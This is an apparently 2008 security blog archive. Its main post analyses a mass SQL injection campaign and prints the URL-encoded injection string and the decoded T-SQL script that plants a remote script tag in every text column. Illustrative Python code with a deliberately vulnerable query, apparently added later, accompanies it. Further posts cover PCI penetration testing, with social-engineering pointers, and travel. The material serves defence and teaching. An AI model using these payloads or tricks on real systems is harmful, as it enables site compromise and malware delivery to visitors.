Archive for April, 2008

Scary Mass-SQL Attack…

April 30, 2008

With well over half a million websites compromised, if you have not already heard about the live mass SQL exploit, get reading. This is real, this is clever, and it is scary. This attack is creative to the tune of rain forest puppy and resourceful like Johnny Long. The attack basically uses SQL Injection to embed an XSS attack.

Note- I’m about a month behind the 8-ball here; this was published in mid-March.

This brings to light the importance of including Google Hacking as part of your penetration testing and corporate due diligence. Googledorks beware- if Google has cached any form of database error messages on your sites, you’re only inviting trouble.

This attack is the largest scale attack using SQL injection I have heard of. Some of the earliest work on SQL injection may have been published by rfp back in 1998. We all know SQL injection has been in the news, has the attention of the payment card brands, and may have found its way into corporate executive vocabulary (if not led or followed by an expletive from time to time).

Exploit Summary, by WhiteHat’s Mitchell Poortinga

This is a SQL Injection vulnerability in ASP applications that build the SQL query directly from a query string; attackers run “scripted” attacks (in this case, bots). The SQL attack injects a link to a .js file into text fields in the database. When the application renders a database field, the malicious JavaScript executes as cross-site scripting.
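The root cause described above is query strings concatenated straight into SQL text. Here is a minimal sketch of the pattern using Python and sqlite3 as a stand-in for the ASP/MS SQL stack (the table name, payload, and function names are all made up for illustration), contrasting the concatenated query with a parameterized one:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
conn.execute("INSERT INTO products VALUES (1, 'widget')")

def vulnerable_lookup(user_input):
    # Vulnerable: the query-string value is concatenated directly into
    # the SQL text -- exactly the pattern this attack exploits.
    sql = "SELECT name FROM products WHERE id = " + user_input
    return conn.executescript(sql)  # executescript permits stacked statements

def safe_lookup(user_input):
    # Safe: the value is bound as a parameter and never parsed as SQL.
    return conn.execute("SELECT name FROM products WHERE id = ?",
                        (user_input,)).fetchall()

# A stacked-query payload like the one in this attack rides in on the
# vulnerable path and rewrites the stored data:
vulnerable_lookup(
    "1; UPDATE products SET name = name || '<script src=evil.js></script>'")

# The same payload handed to the parameterized query simply matches
# nothing instead of executing:
safe_lookup("1; UPDATE products SET name = 'pwned'")
```

The sqlite3 quirk of needing `executescript` to run stacked statements mirrors the ASP behavior: the attack only works because the platform happily executes multiple statements from one request parameter.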
Attack profile

* Two initial query strings that do some basic injection, apparently as a test.
* In some cases, one or more additional queries, specifically calling IS_SRVROLEMEMBER().
* Two final queries that DECLARE a variable, CAST a large hex value into NVARCHAR, and then EXEC() that string. The string contains a script that appends the link to the .js file onto every string-type column in every table in the database.
* All of these happen within a very short period of time. The only lag seems to be the time it takes the final two queries to execute. (In the case with the largest database, the last query actually failed with a timeout. That’s not surprising, since it’s essentially doing a find-and-replace across the entire database.)

example:
id=z;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300…7200%20AS%20NVARCHAR(4000));EXEC(@S);--

which means:
DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x440045004300…7200 AS NVARCHAR(4000));
EXEC(@S);--

… = a few hundred chars that were not included (hex encoded values)

So, here’s what this little bit of T-SQL is doing:

1. Declaring a variable, @S, as an NVARCHAR.
2. Taking a long hex value that is really a Unicode string and casting it as NVARCHAR. In other words, we’re taking this hex representation of a string and turning it into a real string.
3. Once that’s done, we execute that string as a T-SQL statement.
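The CAST step above can be reproduced outside of SQL Server. An NVARCHAR is UTF-16LE under the hood, so the hex blob is just an encoded string. A quick Python sketch of the same decode, using a made-up fragment of payload (the real one runs to a few hundred bytes):

```python
# "DECLARE " spelled out in UTF-16LE hex, as the attack's CAST would see it.
# Each character is two bytes: 0x44 0x00 = 'D', 0x45 0x00 = 'E', etc.
hex_payload = "4400450043004C004100520045002000"

decoded = bytes.fromhex(hex_payload).decode("utf-16-le")
print(decoded)  # -> DECLARE
```

This is also why the injected query string looks like line noise in web server logs: the interesting part is a single opaque hex literal until you decode it.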

Wikipedia’s definition of T-SQL: “Transact-SQL (T-SQL) is Microsoft’s and Sybase’s proprietary extension to the SQL language. Microsoft’s implementation ships in the Microsoft SQL Server product. Sybase uses the language in its Adaptive Server Enterprise, the successor to Sybase SQL Server.”

Microsoft defines NVARCHAR as “Variable-length Unicode character data. n can be a value from 1 through 4,000.”

Here is the CAST string decoded:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.211796*.net/f****p.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
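Cleanup is essentially the cursor script run in reverse: enumerate every text column in every user table and strip the injected tag. A hedged sketch in Python using sqlite3 (whose `sqlite_master` and `PRAGMA table_info` stand in for the `sysobjects`/`syscolumns` join above; the table, column, and URL are all hypothetical, and a real response would work from clean backups, not in-place edits):

```python
import sqlite3

# Hypothetical injected marker -- substitute the exact string from your logs.
TAG = "<script src=http://evil.example/x.js></script>"

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE comments (body TEXT)")
conn.execute("INSERT INTO comments VALUES (?)", ("nice post" + TAG,))

# Walk every user table and its text-typed columns, mirroring the
# injected cursor, then strip the tag instead of appending it.
for (table,) in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'"):
    for col in conn.execute(f"PRAGMA table_info({table})"):
        name, ctype = col[1], (col[2] or "").upper()
        if "CHAR" in ctype or "TEXT" in ctype:
            conn.execute(
                f"UPDATE [{table}] SET [{name}] = replace([{name}], ?, '')",
                (TAG,))

print(conn.execute("SELECT body FROM comments").fetchone()[0])  # nice post
```

Note how little the attacker needed to know about the target schema: the catalog tables hand over every table and string column, which is exactly why one generic payload worked against half a million sites.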

The majority of this information is from Neil Carpenter’s anatomical description of the SQL incident here.

McAfee Avert Labs has an overview here.

PCI Requirement 11.3.2 – Penetration Testing

April 28, 2008

Tod raised a question in response to the PCI 6.6 Information Supplement Released post, a question many QSAs hear (and one echoed in several email responses to that post). These concerns were also raised by Rory on his blog.

First, we need to be current with the ‘Information Supplement: Requirement 11.3 Penetration Testing‘ on the PCI SSC’s website. I will also be paraphrasing Michael Dahn’s post over at pcianswers.com, and related posts in that forum. I will compare/contrast the implications of application testing in 6.6 and penetration testing in 11.3(.2) tomorrow.

Requirement 11 is titled, “Regularly test security systems and processes,” while Requirement 11.3 states, “Perform penetration testing at least once a year, and after any significant infrastructure or application upgrade or modification…”

From the supplement, “The scope of penetration testing is the cardholder data environment and all systems and networks connected to it. If network segmentation is in place such that the cardholder data environment is isolated from other systems, and such segmentation has been verified as part of the PCI DSS assessment, the scope of the penetration test can be limited to the cardholder data environment.”

Comprehensive penetration testing is intended to efficiently uncover flaws, mistakes, deviations, and weaknesses in “secured” environments and processes. Testing should not be limited to the applications and systems involved, but should cover anything that could serve as a ‘jumping-off point’ (jargon: a base of operations for an attack) on the network segment where sensitive data resides. Any system, platform, or process, whether technical or human-driven, that is in any way involved with the data set in question (cardholder data) should be probed for weakness, and any weakness found should be explored in the penetration testing exercise.

PLEASE- do not get distracted by correcting exploited vulnerabilities; focus on the flawed processes or procedures that created them. Find the root cause.

Ever heard of ‘vulnerability whack-a-mole’? Vulnerability and penetration testing exercises often incite the reflexive corporate ‘to-do’ response of correcting the problem identified. The whole point of the exercise isn’t to find a single deficiency, but to find flaws in the process. (I’m going to skip the anecdotal reference to an ISO 9001 audit… precision in process is NOT doing what you say you will do, but doing it absolutely every time- thus a mistake in design delivers a mistake in production with 100% efficiency!!)

A flaw in any process design will systematically allow weakness; this is how security testers find vulnerabilities with a high degree of consistency. This is also how our operations team continually finds vulnerabilities in code that was already corrected- the corrections never got checked back into the source code tracking system.

An attacker’s apology…

Defending an information asset is very difficult, while attacking is very easy. Defenders must protect everything, absolutely, while attackers only need to find one mistake or vulnerability. This is what true penetration testing is all about.

Please understand that my job in InfoSec has always been easy. I have spent my short life studying organizations tasked with the protection of information assets. These companies teach good auditors what mistakes are often made, and how to exploit them for maximum leverage. My job was EASY in comparison to those of these security professionals. *IF* I were tasked with the thankless job of defending a network, I would use the annual penetration testing requirement like an annual physical, and call in a dedicated expert any time something significant changed.

What is a significant infrastructure or application upgrade?
Your penetration testing investment should be reserved for truly noteworthy changes: altering network or DMZ topology; changing operating systems, application, or database platforms; security and network device replacement; etc. Even changes to admissions or visitor registration, a new facility, or the opening of a new data center begs for exploration by a social engineer!

For many environments, the majority of changes would be insignificant (including most minor code updates), and security concerns should be detected through operational security due-care exercises described in PCI Requirements 2.2, 6.1, 6.3, 6.6, and others.

What exactly does penetration testing call for?

The guidance speaks to attack vectors and techniques: “Consider including all of these penetration-testing techniques (as well as others) in the methodology, such as social engineering and the exploitation of exposed vulnerabilities, access controls on key systems and files, web-facing applications, custom applications, and wireless connections.”

This is what information security practitioners dream about. PCI has clearly stated that a penetration test must reach beyond the technology, and encompass business practices, physical security, and social engineering! One of my peers always stated in executive reports, “if you think you can solve the security problem with technology, you clearly do not understand the problem.”

Penetration testing goes far beyond the actions required in PCI Requirement 11.2 for vulnerability scanning at the network layer (ASV, or Approved Scanning Vendor, services) or Requirement 6.6 for the detection and correction of vulnerabilities in custom application code- this is about exploring how deep different vulnerabilities allow attacks to travel. This is active exploitation, not passive vulnerability detection or verification that vulnerabilities exist.

Don’t neglect Social Engineering

The effectiveness of security controls, technology, and business processes is dwarfed by the creative genius of those humans trusted with sensitive information. You’ve seen the Think Geek t-shirt, “there is no patch for human stupidity.” I won’t admit to owning one.

Here is a very short exercise for those new to the science of social engineering:

  • Does development sanitize (remove) sensitive data (credit card numbers) from the databases they use?
    What are the odds of the help desk team walking off with a computer… or maybe out of the building?
  • Does your new-hire process carefully identify employees before issuing user credentials?
    Ever tried sneaking in with a batch of new hires?
  • Do remote offices carefully validate the identity and work orders for support personnel?
    Do remote offices disdain visits from technical support? c’mon….
  • Does the help desk carefully authenticate callers needing help for password resets?
    I hate to reference the classic Mitnick, but, well, errr- it’s classic and it still works!

Special situations require special responses. Every process has a shortcut; there is always someone with the ability to skip a step or make a judgment call. Have you ever ‘donated’ your wallet while traveling? If someone else has your government-issued ID, how do you get past a security checkpoint without missing your flight? Given the right circumstances, anything is possible, and any obstacle can be overcome.

ahh, New York in the Spring

April 24, 2008

IT IS A BEAUTIFUL DAY IN NEW YORK, and I’m taking a long lunch to post on something NON-WORK related. I’m sitting in Bryant Park in Midtown Manhattan, somewhere around 40th or 41st and 6th Ave. It’s gotta be 80 degrees Fahrenheit, I can’t see a cloud anywhere, and there are people as far as the eye can see.

I’m winding down from a two week trip where I participated in PCI meetings at the ETA show in Las Vegas last week, took the 6am flight from LAS to DFW for a couple full days of meetings, a beautiful weekend of motorcycles in Dallas, the TRISC conference in San Antonio, and another presentation tomorrow in NYC before flying home on Saturday.

Couple anecdotes from the trip:

  • The Las Vegas security checkpoint takes an entire HOUR at 4:30 AM.
    Not a joke, you’ve been warned.
    I was flying American out of one of the ‘B’ gates. About halfway through the ‘security checkpoint lemming’ experience, the caffeine kicked in and I realized that the ‘A’ gate checkpoint would allow faster passage to the ‘B’ gates. Yeah, at that hour you don’t see clearly- but I probably still shaved 20 minutes off my time. Here’s a diagram showing the fork between the A and B gates. Skip the B checkpoint.
  • A Harley does not ride like a Bimmer.
    Thanks to Bill and Ethan, I spent most of Saturday riding a ’00 Harley Dyna Wide-Glide. I live to ride and own an array of two-wheeled machinery, but haven’t spent time on a Harley. Good times- but you’ve got to know that when good Harleys die and get to heaven, they turn into BMW motorcycles. Bill and I stopped by to see our buddy Gary Queen at OSC (this link is probably NSFW, Other Side Customs); he’s always doing some of the coolest projects. After hearing a couple of stories we crashed a surprise birthday party- well done, guys.
  • God Bless Texas.
    I was born in Texas, but have actually only spent about 4 years living there. (read: I have my Native Texan card, but that’s about it) I’ve been working in California for almost a year. Some of my bills accumulate in San Francisco, but every trip back through reminds me- my heart is in Texas.
  • Lock Picking is EASY
    TRISC was outstanding. When you’re not hearing presentations, conferences are good for intros, putting faces with names, catching up with friends, and learning some new foo. Deviant Ollam was at the conference, maintaining quite the crowd with his booth-based training and lock-picking village, “Gringo Warrior.” I met several of the gents from the Denim Group, including Dan Cornell and John Dickson- very cool guys. It is always a pleasure catching up with the talented Robert Hansen.

Enough about non-work related actions, I owe Tod a post on PCI 11.3.2 vs 6.6…